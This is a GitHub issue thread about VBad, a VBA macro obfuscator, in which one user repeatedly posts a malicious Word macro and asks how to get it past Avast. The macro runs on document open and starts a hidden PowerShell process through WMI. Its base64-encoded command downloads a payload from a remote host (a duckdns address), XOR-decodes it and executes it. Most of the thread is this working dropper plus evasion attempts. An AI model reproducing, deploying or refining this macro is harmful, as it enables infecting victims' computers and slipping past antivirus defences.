Closed gearcapitan closed 7 years ago
Pepitoh
commented
7 years ago Hi,
I tried with a normal prepared VBA obfuscate with VBad on virustotal. 0 detection found. Your VBA itself must contains a function that trigger an avast signature. I made a few test and I think it's the Shell() function (i tried both and only the one with shell() has been catched).
But, it's not directly related to VBad, I close the issue,
Pepitoh.
gearcapitan
commented
7 years ago Would you be so kind as to present examples of macros that you use to base my own?
Pepitoh
commented
7 years ago You can take for instance the example available in the git
gearcapitan
commented
7 years ago Other examples of infection?
ghost
commented
7 years ago I would be highly interested too.
gearcapitan
commented
7 years ago Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim Str As String str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT" str = str + "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" str = str + "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" str = str + "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" str = str + "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" str = str + "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" str = str + "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" str = str + "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" str = str + "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" str = str + "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" str = str + "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" str = str + "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" str = str + "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" str = str + "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" str = str + "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" str = str + "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" str = str + "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" str = str + "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" str = str + "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" str = str + "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" str = str + "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" str = str + "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" str = str + "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" str = str + "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" str = str + "BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" str = str + "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" str = str + "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" str = str + "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" str = str + "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] [rdm::8]strComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & strComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create str, Null, objConfig, intProcessID[!!] End Function
what is the problem?
gearcapitan
commented
7 years ago Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim Str As String [rdm::8]str[!!] = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT" [rdm::8]str = str +[!!] "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" [rdm::8]str = str +[!!] "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" [rdm::8]str = str +[!!] "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" [rdm::8]str = str +[!!] "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" [rdm::8]str = str +[!!] "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" [rdm::8]str = str +[!!] "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" [rdm::8]str = str +[!!] "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" [rdm::8]str = str +[!!] "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" [rdm::8]str = str +[!!] "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" [rdm::8]str = str +[!!] "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" [rdm::8]str = str +[!!] "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" [rdm::8]str = str +[!!] "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" [rdm::8]str = str +[!!] "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" [rdm::8]str = str +[!!] "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" [rdm::8]str = str +[!!] "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" [rdm::8]str = str +[!!] "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" [rdm::8]str = str +[!!] "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" [rdm::8]str = str +[!!] "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" [rdm::8]str = str +[!!] "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" [rdm::8]str = str +[!!] "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" [rdm::8]str = str +[!!] "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" [rdm::8]str = str +[!!] "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" [rdm::8]str = str +[!!] "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" [rdm::8]str = str +[!!] "BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" [rdm::8]str = str +[!!] "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" [rdm::8]str = str +[!!] "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" [rdm::8]str = str +[!!] "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" [rdm::8]str = str +[!!] "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] [rdm::8]strComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & strComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create str, Null, objConfig, intProcessID[!!] End Function
gearcapitan
commented
7 years ago Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim Azh As String [rdm::8]azh[!!] = "powershel" [rdm::8]azh = azh +[!!] "l.exe -NoP -sta -NonI -W Hidden -Enc WwBT" [rdm::8]azh = azh +[!!] "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" [rdm::8]azh = azh +[!!] "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" [rdm::8]azh = azh +[!!] "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" [rdm::8]azh = azh +[!!] "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" [rdm::8]azh = azh +[!!] "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" [rdm::8]azh = azh +[!!] "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" [rdm::8]azh = azh +[!!] "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" [rdm::8]azh = azh +[!!] "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" [rdm::8]azh = azh +[!!] "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" [rdm::8]azh = azh +[!!] "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" [rdm::8]azh = azh +[!!] "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" [rdm::8]azh = azh +[!!] "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" [rdm::8]azh = azh +[!!] "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" [rdm::8]azh = azh +[!!] "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" [rdm::8]azh = azh +[!!] "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" [rdm::8]azh = azh +[!!] "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" [rdm::8]azh = azh +[!!] "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" [rdm::8]azh = azh +[!!] "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" [rdm::8]azh = azh +[!!] "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" [rdm::8]azh = azh +[!!] "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" [rdm::8]azh = azh +[!!] "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" [rdm::8]azh = azh +[!!] "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" [rdm::8]azh = azh +[!!] "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" [rdm::8]azh = azh +[!!] "BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" [rdm::8]azh = azh +[!!] "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" [rdm::8]azh = azh +[!!] "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" [rdm::8]azh = azh +[!!] "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" [rdm::8]azh = azh +[!!] "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] Dim [rdm::8]azhComputer[!!] Dim [rdm::8]objConfig[!!] Dim [rdm::8]objProcess[!!] Dim [rdm::8]objStartup[!!] Dim [rdm::8]objWMIService[!!] Dim [rdm::8]intProcessID[!!] [rdm::8]azhComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & azhComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & azhComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create azh, Null, objConfig, intProcessID[!!] End Function
this is imposible :'(
gearcapitan
commented
7 years ago Sub [rdm::8]AutoOpen()[!!] [rdm::8]Debugging[!!] End Sub
Sub [rdm::8]Document_Open()[!!] [rdm::8]Debugging[!!] End Sub
Public Function [rdm::8]Debugging()[!!] As Variant Dim [rdm::8]Azh[!!] [rdm::8]azh[!!] = "powershel" [rdm::8]azh = azh +[!!] "l.exe -NoP -sta -NonI -W Hidden -Enc WwBT" [rdm::8]azh = azh +[!!] "AHkAUwB0AEUAbQAuAE4AZQBUAC4AUwBFAFIAdgBpAEMARQBQAE" [rdm::8]azh = azh +[!!] "8ASQBuAFQATQBhAE4AQQBnAGUAcgBdADoAOgBFAFgAUABlAGMA" [rdm::8]azh = azh +[!!] "VAAxADAAMABDAE8ATgB0AGkATgBVAGUAIAA9ACAAMAA7ACQAVw" [rdm::8]azh = azh +[!!] "BjAD0ATgBFAFcALQBPAGIASgBlAEMAVAAgAFMAWQBTAHQAZQBt" [rdm::8]azh = azh +[!!] "AC4ATgBFAFQALgBXAGUAQgBDAEwAaQBlAE4AdAA7ACQAdQA9AC" [rdm::8]azh = azh +[!!] "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A" [rdm::8]azh = azh +[!!] "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA" [rdm::8]azh = azh +[!!] "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw" [rdm::8]azh = azh +[!!] "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAYwAuAE" [rdm::8]azh = azh +[!!] "gAZQBBAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA" [rdm::8]azh = azh +[!!] "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAQwAuAFAAUgBvAHgAWQ" [rdm::8]azh = azh +[!!] "AgAD0AIABbAFMAeQBTAHQARQBtAC4ATgBlAHQALgBXAEUAQgBS" [rdm::8]azh = azh +[!!] "AGUAUQBVAEUAUwB0AF0AOgA6AEQAZQBGAEEAdQBMAHQAVwBlAG" [rdm::8]azh = azh +[!!] "IAUAByAE8AWABZADsAJABXAEMALgBQAHIAbwBYAFkALgBDAFIA" [rdm::8]azh = azh +[!!] "ZQBEAGUATgB0AGkAYQBsAFMAIAA9ACAAWwBTAFkAUwB0AEUAbQ" [rdm::8]azh = azh +[!!] "AuAE4ARQBUAC4AQwByAEUAZABFAE4AdABJAEEAbABDAEEAYwBI" [rdm::8]azh = azh +[!!] "AEUAXQA6ADoARABFAGYAYQBVAEwAdABOAEUAVAB3AE8AcgBrAE" [rdm::8]azh = azh +[!!] "MAUgBlAGQAZQBuAFQASQBhAGwAUwA7ACQASwA9ACcANwAlAHkA" [rdm::8]azh = azh +[!!] "LgBBAGgAIwAzAEQAZAB1AEYAdAB2AEUAVQByAF8ATABpAG0AMg" [rdm::8]azh = azh +[!!] "BaAFYAbgB4AGoAYAA2AGEAKgBUACcAOwAkAGkAPQAwADsAWwBj" [rdm::8]azh = azh +[!!] "AEgAYQBSAFsAXQBdACQAQgA9ACgAWwBjAGgAQQByAFsAXQBdAC" [rdm::8]azh = azh +[!!] "gAJABXAEMALgBEAE8AdwBOAEwATwBBAEQAUwBUAFIAaQBOAEcA" [rdm::8]azh = azh +[!!] "KAAiAGgAdAB0AHAAOgAvAC8AbQBtAHMAbgBtAGkAYwByAG8Acw" [rdm::8]azh = azh +[!!] "BvAGYAdAAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwA6ADgAMAAx" [rdm::8]azh = azh +[!!] "AC8AaQBuAGQAZQB4AC4AYQBzAHAAIgApACkAKQB8ACUAewAkAF" [rdm::8]azh = azh +[!!] "8ALQBCAFgAbwBSACQAawBbACQASQArACsAJQAkAGsALgBMAGUA" [rdm::8]azh = azh +[!!] "TgBHAFQAaABdAH0AOwBJAEUAWAAgACgAJABCAC0AagBPAEkAbg" [rdm::8]azh = azh +[!!] "AnACcAKQA=" Const [rdm::8]HIDDEN_WINDOW = 0[!!] Dim [rdm::8]azhComputer[!!] Dim [rdm::8]objConfig[!!] Dim [rdm::8]objProcess[!!] Dim [rdm::8]objStartup[!!] Dim [rdm::8]objWMIService[!!] Dim [rdm::8]intProcessID[!!] [rdm::8]azhComputer = "."[!!] Set [rdm::8]objWMIService = GetObject("winmgmts:\" & azhComputer & "\root\cimv2")[!!] Set [rdm::8]objStartup = objWMIService.Get("Win32ProcessStartup")[!!] Set [rdm::8]objConfig = objStartup.SpawnInstance [!!] [rdm::8]objConfig.ShowWindow = HIDDEN_WINDOW[!!] Set [rdm::8]objProcess = GetObject("winmgmts:\" & azhComputer & "\root\cimv2:Win32_Process")[!!] [rdm::8]objProcess.Create azh, Null, objConfig, intProcessID[!!] End Function
http://nodistribute.com/result/ZXMKCHe2Fokl7OJBTdD nothing work, Avast is a GOD!
http://nodistribute.com/result/DMNXkzbWmc4eAwR